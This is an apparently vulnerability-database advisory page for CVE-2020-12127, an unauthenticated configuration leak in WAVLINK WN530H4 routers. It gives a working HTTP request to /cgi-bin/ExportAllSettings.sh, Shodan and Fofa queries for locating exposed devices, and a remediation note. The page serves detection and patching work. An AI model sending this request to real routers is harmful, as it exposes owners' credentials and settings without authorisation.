🔙 목록으로 돌아가기

CVE-2020-12127: WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure

TitleWAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure
Authorarafatansari
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials.
RemediationApply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
CVSS Score7.5
EPSS Score0.1847
CVE IDCVE-2020-12127
CWE IDCWE-306
Shodan Queryhttp.html:"Wavlink"http.html:"wavlink"
Fofa Querybody="wavlink"
Tags cve cve2020 wavlink exposure vuln

🔍 Vulnerability Description

WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.

🌐 HTTP Request

GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-12127.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-12127.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A